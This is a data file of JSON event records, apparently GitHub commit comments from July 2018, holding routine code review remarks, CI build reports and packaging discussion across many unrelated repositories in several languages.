{"id":"8008214850","type":"CommitCommentEvent","actor":{"login":"burhanndem"},"repo":{"name":"burhanndem/pycharm"},"payload":{"comment":{"id":29809785,"position":null,"line":null,"path":null,"commit_id":"32e87a985fcc2e7198562e4bbfd6c4adf003b652","created_at":"2018-07-24T07:01:19Z","updated_at":"2018-07-24T07:01:19Z","author_association":"OWNER","body":"args,kwargs"}},"created_at":"2018-07-24T07:01:19Z"}
{"id":"8008215419","type":"CommitCommentEvent","actor":{"login":"W1nU"},"repo":{"name":"Joiple/2018-Busan-ICT-Hackerton"},"payload":{"comment":{"id":29809790,"position":null,"line":null,"path":null,"commit_id":"bab80cff0c00ec786bc8e39bcf38cfe5a6b2af15","created_at":"2018-07-24T07:01:27Z","updated_at":"2018-07-24T07:01:27Z","author_association":"CONTRIBUTOR","body":"arcade refresh"}},"created_at":"2018-07-24T07:01:27Z"}
{"id":"8008216504","type":"CommitCommentEvent","actor":{"login":"W1nU"},"repo":{"name":"Joiple/2018-Busan-ICT-Hackerton"},"payload":{"comment":{"id":29809792,"position":null,"line":null,"path":null,"commit_id":"bab80cff0c00ec786bc8e39bcf38cfe5a6b2af15","created_at":"2018-07-24T07:01:45Z","updated_at":"2018-07-24T07:01:45Z","author_association":"CONTRIBUTOR","body":"qrcode refresh"}},"created_at":"2018-07-24T07:01:45Z"}
{"id":"8008217669","type":"CommitCommentEvent","actor":{"login":"mynukeviet"},"repo":{"name":"huuthoqt1994/lynx"},"payload":{"comment":{"id":29809794,"position":null,"line":null,"path":null,"commit_id":"dc1d83d18bd27ed556bdb1670717077450d109d0","created_at":"2018-07-24T07:02:03Z","updated_at":"2018-07-24T07:02:03Z","author_association":"NONE","body":"Đang còn nhiều chổ dùng `$admin_info`, tìm kiếm thay lại hết\r\n\r\nNếu có dùng `$array_name[]` thì trước đó em phải khởi tạo `$array_name = array();`"}},"created_at":"2018-07-24T07:02:03Z"}
{"id":"8008227837","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29809817,"position":null,"line":null,"path":null,"commit_id":"f641c7a1bf2f4ac2628d6340a3e07862e359944a","created_at":"2018-07-24T07:04:40Z","updated_at":"2018-07-24T07:04:40Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-order-sc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-order-sc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-order-sc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T07:04:40Z"}
{"id":"8008229090","type":"CommitCommentEvent","actor":{"login":"mimugmail"},"repo":{"name":"opnsense/ports"},"payload":{"comment":{"id":29809827,"position":null,"line":null,"path":null,"commit_id":"22e295b2dfe645bfc7590caaa4557db7032d890f","created_at":"2018-07-24T07:04:58Z","updated_at":"2018-07-24T07:04:58Z","author_association":"MEMBER","body":"Thx <3 I have to find the time to test the file extraction features too :)"}},"created_at":"2018-07-24T07:04:58Z"}
{"id":"8008233299","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"31m059/Stockfish"},"payload":{"comment":{"id":29809834,"position":null,"line":null,"path":null,"commit_id":"b7aa7b43bb975ee76b1b3a2ebc89dcaeff94d2e3","created_at":"2018-07-24T07:06:00Z","updated_at":"2018-07-24T07:06:00Z","author_association":"OWNER","body":"@snicolet Here: http://tests.stockfishchess.org/tests/view/5b56cf960ebc5902bdb86162"}},"created_at":"2018-07-24T07:06:00Z"}
{"id":"8008234775","type":"CommitCommentEvent","actor":{"login":"strogonoff"},"repo":{"name":"riboseinc/asciidoctor-iso"},"payload":{"comment":{"id":29809836,"position":null,"line":null,"path":null,"commit_id":"f44cea712bd30f0036c13f15038d625c12a7dc40","created_at":"2018-07-24T07:06:22Z","updated_at":"2018-07-24T07:06:22Z","author_association":"NONE","body":"@opoudjis Only now noticed, thanks for putting up these docs here.\r\n\r\nHow docs are found (you probably don’t need the below info unless in future open project site maintenance duty shifts to project maintainers, I’ll submit a PR taking care of it):\r\n\r\nOpen Project site build looks under `docs/` for software documentation, but in its current implementation the theme won’t expose docs unless it finds a doc called “navigation”. Navigation doc is expected to be empty apart from YAML frontmatter, which should define navigation across other files under `docs/`. [This is an example of navigation.adoc](https://raw.githubusercontent.com/riboseinc/asciidoctor-rfc/master/docs/navigation.md). "}},"created_at":"2018-07-24T07:06:22Z"}
{"id":"8008235856","type":"CommitCommentEvent","actor":{"login":"SrikrushnaP"},"repo":{"name":"SrikrushnaP/angular_tutorial"},"payload":{"comment":{"id":29809839,"position":null,"line":null,"path":null,"commit_id":"8b0f1fa3fa91db9db450277bf779657db3b76cf7","created_at":"2018-07-24T07:06:39Z","updated_at":"2018-07-24T07:06:39Z","author_association":"OWNER","body":"For creating component where the style and template is inline **ng g c second -it -is**\r\nWe comment the previous component(_app component_- <app-first></app-first>) in **app.component.html** for better visibility, If you want to see the output along with this you may un--comment that line only."}},"created_at":"2018-07-24T07:06:39Z"}
{"id":"8008236030","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29809841,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-24T07:06:42Z","updated_at":"2018-07-24T07:06:42Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-24T07:06:42Z"}
{"id":"8008236224","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29809842,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-24T07:06:46Z","updated_at":"2018-07-24T07:06:46Z","author_association":"OWNER","body":"I don't see it. `ProcessCacheEntry()` sets `c.successfully_resolved_at` and `c.addr` together while holding a lock, and here we read them under a lock. Am I missing something?\r\n\r\nFWIW, it *is* possible that `c.addr` is `null` here. This can happen if `dns_cache_ttl` is practically infinite (`epoch + dns_cache_ttl > now`), we have tried to resolve the address at least once, and all attempts to resolve have failed. This is fine -- `null` is correct in this case. This code is written to correctly handle infinite durations. This is the reason for the `c.callbacks.empty()` checks in the first two `if` conditions in `ProcessCacheEntry()`."}},"created_at":"2018-07-24T07:06:46Z"}
{"id":"8008255766","type":"CommitCommentEvent","actor":{"login":"strogonoff"},"repo":{"name":"riboseinc/asciidoctor-iso"},"payload":{"comment":{"id":29809872,"position":null,"line":null,"path":null,"commit_id":"f44cea712bd30f0036c13f15038d625c12a7dc40","created_at":"2018-07-24T07:11:30Z","updated_at":"2018-07-24T07:11:30Z","author_association":"NONE","body":"Also of note, GitHub actually allows for the README to be placed under docs/README, i.e. by placing it there software repos can have the same README file serve both as repository’s “landing page” on GitHub _and_ as part of Open Project site navigation without duplicating the content."}},"created_at":"2018-07-24T07:11:30Z"}
{"id":"8008259035","type":"CommitCommentEvent","actor":{"login":"hudahui"},"repo":{"name":"hudahui/hello-world"},"payload":{"comment":{"id":29809883,"position":null,"line":null,"path":null,"commit_id":"99d23cbeb9dedc9bbaac75789b5d947f501cdf42","created_at":"2018-07-24T07:12:16Z","updated_at":"2018-07-24T07:12:16Z","author_association":"OWNER","body":"The First Assignment"}},"created_at":"2018-07-24T07:12:16Z"}
{"id":"8008268182","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809907,"position":6,"line":6,"path":"1/area_of_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:14:32Z","updated_at":"2018-07-24T07:14:32Z","author_association":"NONE","body":"Нужно, чтобы не было красной стрелки, которую показывает Github в конце строки.  для этого найди для своего редактора как настроить автодобавление пустой строки в конце файла."}},"created_at":"2018-07-24T07:14:32Z"}
{"id":"8008271421","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809917,"position":5,"line":5,"path":"1/area_of_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:15:19Z","updated_at":"2018-07-24T07:15:19Z","author_association":"NONE","body":"Приведение типов лучше делать при получении, а не при вычислении"}},"created_at":"2018-07-24T07:15:19Z"}
{"id":"8008277551","type":"CommitCommentEvent","actor":{"login":"jskimm"},"repo":{"name":"cpstdhs/pcap_test"},"payload":{"comment":{"id":29809934,"position":37,"line":37,"path":"ass.cpp","commit_id":"8722acf2947b8a0ea29d65fae5d0d1cd7bdee1d2","created_at":"2018-07-24T07:16:45Z","updated_at":"2018-07-24T07:16:45Z","author_association":"NONE","body":"Done in https://github.com/cpstdhs/pcap_test/commit/8722acf2947b8a0ea29d65fae5d0d1cd7bdee1d2#diff-d374c06b474e3d5243ce16aa41c1fdef"}},"created_at":"2018-07-24T07:16:45Z"}
{"id":"8008278659","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809936,"position":5,"line":5,"path":"1/area_of_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:17:00Z","updated_at":"2018-07-24T07:17:00Z","author_association":"NONE","body":"Лучше давать переменным \"говорящие\" имена, чтобы упростить читатемость и понимание кода\r\nк примеру тут переменные лучше было бы назвать area, height, base"}},"created_at":"2018-07-24T07:17:00Z"}
{"id":"8008281487","type":"CommitCommentEvent","actor":{"login":"844934698"},"repo":{"name":"liuyufeng201/hello_world"},"payload":{"comment":{"id":29809943,"position":3,"line":3,"path":"README.md","commit_id":"1e7e6d496097a3010ecfe250b6b1abd7f26461bd","created_at":"2018-07-24T07:17:40Z","updated_at":"2018-07-24T07:17:40Z","author_association":"CONTRIBUTOR","body":"12345体育 刚发发个发"}},"created_at":"2018-07-24T07:17:40Z"}
{"id":"8008284357","type":"CommitCommentEvent","actor":{"login":"antalu"},"repo":{"name":"antalu/hello"},"payload":{"comment":{"id":29809946,"position":null,"line":null,"path":null,"commit_id":"97ed0b084b2d9ab27a17a4ea1015474dbdc45147","created_at":"2018-07-24T07:18:20Z","updated_at":"2018-07-24T07:18:20Z","author_association":"OWNER","body":"测试嘛，睡吧！"}},"created_at":"2018-07-24T07:18:20Z"}
{"id":"8008284509","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809947,"position":10,"line":10,"path":"1/ideal_weight.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:18:22Z","updated_at":"2018-07-24T07:18:22Z","author_association":"NONE","body":"Приведение типа (to_i) лучше сделать при получении значения от пользователя"}},"created_at":"2018-07-24T07:18:22Z"}
{"id":"8008286542","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809950,"position":15,"line":15,"path":"1/ideal_weight.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:18:51Z","updated_at":"2018-07-24T07:18:51Z","author_association":"NONE","body":"в 15 и 13 строках должно быть по 2 пробела отступ от начала строки"}},"created_at":"2018-07-24T07:18:51Z"}
{"id":"8008290907","type":"CommitCommentEvent","actor":{"login":"philippotto"},"repo":{"name":"scalableminds/webknossos"},"payload":{"comment":{"id":29809964,"position":38,"line":162,"path":"app/assets/javascripts/oxalis/view/nml_upload_zone_container.js","commit_id":"a1b906f6273b5239c990e176d923f06aae0f00aa","created_at":"2018-07-24T07:19:51Z","updated_at":"2018-07-24T07:19:51Z","author_association":"MEMBER","body":"You're right! Thanks for catching that :)"}},"created_at":"2018-07-24T07:19:51Z"}
{"id":"8008290983","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809965,"position":8,"line":8,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:19:52Z","updated_at":"2018-07-24T07:19:52Z","author_association":"NONE","body":"когда используется to_i или to_f - можно не использовать chomp. Эти методы избавятся от невидимого символа новой строки за нас"}},"created_at":"2018-07-24T07:19:52Z"}
{"id":"8008293402","type":"CommitCommentEvent","actor":{"login":"mariofusco"},"repo":{"name":"kiegroup/droolsjbpm-knowledge"},"payload":{"comment":{"id":29809973,"position":null,"line":null,"path":null,"commit_id":"2a01202b23d6088257843771cbf8b88da6dbffde","created_at":"2018-07-24T07:20:23Z","updated_at":"2018-07-24T07:20:23Z","author_association":"MEMBER","body":"I don't think that change could have any impact in KieSession creation. We have a few benchmarks here https://github.com/kiegroup/kie-benchmarks actually demonstrating the opposite. If you can confirm your perf issue in KieSession creation can you please open a ticket on our jira and attach a reproducer there?"}},"created_at":"2018-07-24T07:20:23Z"}
{"id":"8008293580","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29809974,"position":null,"line":null,"path":null,"commit_id":"321095f186e9ccc53d129b2394dcffb91ab4e8de","created_at":"2018-07-24T07:20:26Z","updated_at":"2018-07-24T07:20:26Z","author_association":"MEMBER","body":":+1: "}},"created_at":"2018-07-24T07:20:26Z"}
{"id":"8008293656","type":"CommitCommentEvent","actor":{"login":"Aaroncarmona"},"repo":{"name":"Aaroncarmona/Ideo"},"payload":{"comment":{"id":29809975,"position":null,"line":null,"path":null,"commit_id":"a17cc78e98e47856f5419224d390510a88272c66","created_at":"2018-07-24T07:20:27Z","updated_at":"2018-07-24T07:20:27Z","author_association":"OWNER","body":"Si agregas imagenes para utilizarlos como iconos, te recomiendo que uses vectores.\r\nhttps://materialdesignicons.com/\r\nescojes el icono y lo descargas como XML Vector android"}},"created_at":"2018-07-24T07:20:27Z"}
{"id":"8008300555","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29809989,"position":10,"line":10,"path":"1/quadratic_equation.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:21:50Z","updated_at":"2018-07-24T07:21:50Z","author_association":"NONE","body":"Вокруг оператора возведения в степень, не нужно ставить пробелы. Этот оператор исключение.\r\n```\r\n# плохо\r\nb ** 2\r\n# хорошо\r\nb**2\r\n```\r\nС остальными опереторами индентация верная"}},"created_at":"2018-07-24T07:21:50Z"}
{"id":"8008301864","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29809994,"position":45,"line":82,"path":"core/descriptors/src/org/jetbrains/kotlin/builtins/suspendFunctionTypes.kt","commit_id":"39c912ae270dd8f04db4129f8479800e35b89c47","created_at":"2018-07-24T07:22:06Z","updated_at":"2018-07-24T07:22:06Z","author_association":"MEMBER","body":"Maybe it's worth moving the function into `TypeDeserializer` to make it mark the var in the context instead of returning a boolean value\r\n"}},"created_at":"2018-07-24T07:22:06Z"}
{"id":"8008335543","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29810060,"position":9,"line":9,"path":"1/right_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:29:22Z","updated_at":"2018-07-24T07:29:22Z","author_association":"NONE","body":"Равнобедренность по условию нужно проверять только у прямоугольного треугольника"}},"created_at":"2018-07-24T07:29:22Z"}
{"id":"8008336642","type":"CommitCommentEvent","actor":{"login":"jeroenptrs"},"repo":{"name":"nos/create-nos-dapp"},"payload":{"comment":{"id":29810064,"position":null,"line":null,"path":null,"commit_id":"aa857a3b66dcfffcef051b69c80a870aca8fbc09","created_at":"2018-07-24T07:29:37Z","updated_at":"2018-07-24T07:29:37Z","author_association":"MEMBER","body":"```Before we start, we want to make sure npm is installed via a version manager. To avoid permission issues on different OS, we suggest using nvm.```\r\n\r\nI'd prefer stressing the use of nvm a little bit more 😄 "}},"created_at":"2018-07-24T07:29:37Z"}
{"id":"8008336826","type":"CommitCommentEvent","actor":{"login":"myselfamey"},"repo":{"name":"myselfamey/maths"},"payload":{"comment":{"id":29810065,"position":null,"line":null,"path":null,"commit_id":"2899762216c7f5d8d9eeb8b7d9d1d7cd096682b3","created_at":"2018-07-24T07:29:39Z","updated_at":"2018-07-24T07:29:39Z","author_association":"OWNER","body":"okk got it."}},"created_at":"2018-07-24T07:29:39Z"}
{"id":"8008337898","type":"CommitCommentEvent","actor":{"login":"lxlal1979"},"repo":{"name":"lxlal1979/Hello-World"},"payload":{"comment":{"id":29810067,"position":null,"line":null,"path":null,"commit_id":"e6a5a7acb0dc826bcb582989a17b13217a551a5e","created_at":"2018-07-24T07:29:54Z","updated_at":"2018-07-24T07:29:54Z","author_association":"OWNER","body":"try hard to understand how to use GitHub:("}},"created_at":"2018-07-24T07:29:54Z"}
{"id":"8008339896","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"Lisss13/courses"},"payload":{"comment":{"id":29810079,"position":11,"line":11,"path":"1/right_triangle.rb","commit_id":"673debe6366db5c71e58a14c2e0d0c3682f44458","created_at":"2018-07-24T07:30:20Z","updated_at":"2018-07-24T07:30:20Z","author_association":"NONE","body":"Знаю, что мы не учили массивы, но рекомендую использовать тут массив. Его легко отсортировать используя метод sort.\r\n```\r\nsides = [a, b, c].sort!\r\n```\r\nПопробуем решить найдя сразу длиннейшую сторону"}},"created_at":"2018-07-24T07:30:20Z"}
{"id":"8008340708","type":"CommitCommentEvent","actor":{"login":"jaumeortola"},"repo":{"name":"apertium/apertium-cat"},"payload":{"comment":{"id":29810084,"position":373,"line":17008,"path":"apertium-cat.cat.dix","commit_id":"8b764eef5640f819ca353118eaf28c280a9f8548","created_at":"2018-07-24T07:30:30Z","updated_at":"2018-07-24T07:30:30Z","author_association":"COLLABORATOR","body":"ídem pl>sg"}},"created_at":"2018-07-24T07:30:30Z"}
{"id":"8008349005","type":"CommitCommentEvent","actor":{"login":"dkocich"},"repo":{"name":"dkocich/osm-pt-ngx-leaflet"},"payload":{"comment":{"id":29810104,"position":15,"line":28,"path":"public_src/core/ptTags.class.ts","commit_id":"21adc2fef6d4e1dcbc6279d6fc84d94cc75d493c","created_at":"2018-07-24T07:32:24Z","updated_at":"2018-07-24T07:32:24Z","author_association":"OWNER","body":"if you notice, I usually sort keys alphabetically around the project... you can quickly do it in your IDE too"}},"created_at":"2018-07-24T07:32:24Z"}
{"id":"8008355584","type":"CommitCommentEvent","actor":{"login":"carry1111"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":29810122,"position":2,"line":2,"path":".babelrc","commit_id":"c2c87419fead45ff25168924d2c0e85f083f4a0a","created_at":"2018-07-24T07:33:50Z","updated_at":"2018-07-24T07:33:50Z","author_association":"NONE","body":"\"keyi\""}},"created_at":"2018-07-24T07:33:50Z"}
{"id":"8008356361","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29810124,"position":56,"line":179,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/MemberDeserializer.kt","commit_id":"39c912ae270dd8f04db4129f8479800e35b89c47","created_at":"2018-07-24T07:34:00Z","updated_at":"2018-07-24T07:34:00Z","author_association":"MEMBER","body":"Please, try to avoid logic duplication: forcing upper-bounds + updating parent context might be extracted as a function"}},"created_at":"2018-07-24T07:34:00Z"}
{"id":"8008358067","type":"CommitCommentEvent","actor":{"login":"vityagi"},"repo":{"name":"bpramod/azure-linux-extensions"},"payload":{"comment":{"id":29810126,"position":21,"line":200,"path":"VMBackup/main/freezesnapshotter.py","commit_id":"87e3561dce773a7c59c7aa31df831d06825d5816","created_at":"2018-07-24T07:34:20Z","updated_at":"2018-07-24T07:34:20Z","author_association":"NONE","body":"error spelling"}},"created_at":"2018-07-24T07:34:20Z"}
{"id":"8008358124","type":"CommitCommentEvent","actor":{"login":"TomasKorbar"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810127,"position":null,"line":null,"path":null,"commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-24T07:34:21Z","updated_at":"2018-07-24T07:34:21Z","author_association":"OWNER","body":"Tabs and new lines added at https://github.com/TomasKorbar/tuned/commit/00cfbf8f26dd46730cddd9d6be73030514102f7a"}},"created_at":"2018-07-24T07:34:21Z"}
{"id":"8008361032","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29810132,"position":null,"line":null,"path":null,"commit_id":"e01e4b41c1c48cb6c086913e6c4bd5b0d3c47e63","created_at":"2018-07-24T07:34:59Z","updated_at":"2018-07-24T07:34:59Z","author_association":"MEMBER","body":"We could have a 2.7 version and 3 version, like with ipython and some other packages."}},"created_at":"2018-07-24T07:34:59Z"}
{"id":"8008361149","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29810133,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-24T07:35:01Z","updated_at":"2018-07-24T07:35:01Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2327 of 2328 tests passed, 1 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.png)</a>\n"}},"created_at":"2018-07-24T07:35:01Z"}
{"id":"8008361651","type":"CommitCommentEvent","actor":{"login":"wolfenste"},"repo":{"name":"wolfenste/tictactoe"},"payload":{"comment":{"id":29810134,"position":null,"line":null,"path":null,"commit_id":"156303c7fb3883be9e961afcfe219fec7c4710b6","created_at":"2018-07-24T07:35:08Z","updated_at":"2018-07-24T07:35:08Z","author_association":"OWNER","body":"Hmm, 'configuration for each specific scenario'. That means another thing will manage scenarios, not the Game class (that I thought acts as a controller). I can use a new class, e.g. TicTacToe. But Game and TicTacToe points to the same thing, the tictactoe game. And I have already TicTacToe identifier as a namespace. Or maybe I should use a class named Controller."}},"created_at":"2018-07-24T07:35:08Z"}
{"id":"8008362866","type":"CommitCommentEvent","actor":{"login":"TomasKorbar"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810140,"position":42,"line":42,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-24T07:35:24Z","updated_at":"2018-07-24T07:35:24Z","author_association":"OWNER","body":"Fixed at https://github.com/TomasKorbar/tuned/commit/64b1267beaad20affca6facf2d58e100625945ee#diff-de8af4e87fabeba86a68a3439ebe9430R40"}},"created_at":"2018-07-24T07:35:24Z"}
{"id":"8008363696","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"aritode/ruby-reload"},"payload":{"comment":{"id":29810143,"position":16,"line":16,"path":"M-1/03_right_triangle.rb","commit_id":"fe1f7e77a3de6eadaf5a3cc5a58287c49bd6df4a","created_at":"2018-07-24T07:35:34Z","updated_at":"2018-07-24T07:35:34Z","author_association":"NONE","body":"``` hypotenuse**2 == cathetus1**2 + cathetus2**2 ``` Это выражение и так вернет нам true или false. Так-что можно обойтись без if/else стэйтмента. Просто написав\r\n``` rectangle_triangle = hypotenuse**2 == cathetus1**2 + cathetus2**2 ```"}},"created_at":"2018-07-24T07:35:34Z"}
{"id":"8008367404","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29810152,"position":null,"line":null,"path":null,"commit_id":"610485faa7f8c043482c4a9c030938ed315557e5","created_at":"2018-07-24T07:36:26Z","updated_at":"2018-07-24T07:36:26Z","author_association":"MEMBER","body":"Same goes for `pydocstyle`."}},"created_at":"2018-07-24T07:36:26Z"}
{"id":"8008368237","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29810157,"position":null,"line":null,"path":null,"commit_id":"fc1b41bea3db8faffec69bf84e79a557a8c8127a","created_at":"2018-07-24T07:36:37Z","updated_at":"2018-07-24T07:36:37Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-custom_check: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fc1b41bea3db8faffec69bf84e79a557a8c8127a-PR6846-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a>  \n"}},"created_at":"2018-07-24T07:36:37Z"}
{"id":"8008372062","type":"CommitCommentEvent","actor":{"login":"TomasKorbar"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810161,"position":36,"line":36,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-24T07:37:30Z","updated_at":"2018-07-24T07:37:30Z","author_association":"OWNER","body":"It was not work in progress. I was experimenting a little and then forgot to change it back. Here it should be ok.\r\nhttps://github.com/TomasKorbar/tuned/commit/64b1267beaad20affca6facf2d58e100625945ee#diff-de8af4e87fabeba86a68a3439ebe9430R31"}},"created_at":"2018-07-24T07:37:30Z"}
{"id":"8008377327","type":"CommitCommentEvent","actor":{"login":"dotlambda"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29810174,"position":null,"line":null,"path":null,"commit_id":"e01e4b41c1c48cb6c086913e6c4bd5b0d3c47e63","created_at":"2018-07-24T07:38:41Z","updated_at":"2018-07-24T07:38:41Z","author_association":"MEMBER","body":"Or we override the astroid version for the respective applications/switch them to Python 3."}},"created_at":"2018-07-24T07:38:41Z"}
{"id":"8008378208","type":"CommitCommentEvent","actor":{"login":"TomasKorbar"},"repo":{"name":"TomasKorbar/tuned"},"payload":{"comment":{"id":29810181,"position":34,"line":34,"path":"tests/hardware/test_inventory.py","commit_id":"5e4f868313e2886a61b2711adb1bfc2d6f5e898c","created_at":"2018-07-24T07:38:54Z","updated_at":"2018-07-24T07:38:54Z","author_association":"OWNER","body":"Variable added.\r\nhttps://github.com/TomasKorbar/tuned/commit/64b1267beaad20affca6facf2d58e100625945ee#diff-de8af4e87fabeba86a68a3439ebe9430R7"}},"created_at":"2018-07-24T07:38:54Z"}
{"id":"8008379057","type":"CommitCommentEvent","actor":{"login":"dval"},"repo":{"name":"gamesolids/GameObject-Brush"},"payload":{"comment":{"id":29810183,"position":null,"line":null,"path":null,"commit_id":"ca143586046116a29b88f960957af58dab50a68a","created_at":"2018-07-24T07:39:06Z","updated_at":"2018-07-24T07:39:06Z","author_association":"NONE","body":"VS reformatting random curly-braces chunks is murdering the code.  Hopefully this just sorts itself out after a couple edits. The first commit reformatted all `if` and `for` statements. This commit reformatted all the method calls. ... what else uses curly-braces?"}},"created_at":"2018-07-24T07:39:06Z"}
{"id":"8008379520","type":"CommitCommentEvent","actor":{"login":"SicariusNoctis"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29810188,"position":null,"line":null,"path":null,"commit_id":"b914cc5ed468b9c222cfefed795e5c861cd58d41","created_at":"2018-07-24T07:39:13Z","updated_at":"2018-07-24T07:39:13Z","author_association":"OWNER","body":"@VYUN I figured out what was causing the failed tests.\r\n\r\nConsider the following plot (generated using `make test` then view `log/test_stepper.png`):\r\n\r\n![](https://i.imgur.com/mgjmLw1.jpg)\r\n\r\nWhat's up with the weird behavior near `position=0`? (Numerical instability?)"}},"created_at":"2018-07-24T07:39:13Z"}
